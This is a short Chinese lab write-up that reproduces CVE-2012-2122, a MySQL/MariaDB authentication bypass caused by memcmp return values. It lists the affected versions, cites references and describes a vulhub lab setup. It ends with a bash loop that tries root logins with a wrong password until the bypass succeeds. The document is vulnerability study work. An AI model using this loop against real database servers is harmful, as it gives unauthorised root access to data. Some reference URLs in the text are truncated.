[漏洞复现]Mysql 身份认证绕过漏洞（CVE

mysql身份验证绕过漏洞

受影响版本

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

注：只能在特定编译环境下进行，即编译MySQL的时候加了-fno-builtin，并且所使用的glibc是经SSE优化后的（一般系统自带的都是如此）。

出现这个漏洞是由于memcmp函数只返回返回-128到127范围内的值，在某些平台上进行了优化，导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。大约256次就可以成功一次。具体也没理解清楚。可以看看下面的网址。

参考：vulhub./#/environments/mysql/CVE-2012-2122/ freebuf./vuls/3815.html
blog.rapid7./2012/06/11/cve-2012-2122-a-tragically-edic-security-flaw-in-mysql/
freebuf./vuls/3815.html

复现

我用vulhub搭建了环境

攻击机：kali ：192.168.34.80
靶机：ubuntu18：192.168.34.182

for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.34.182 -P3306 ; done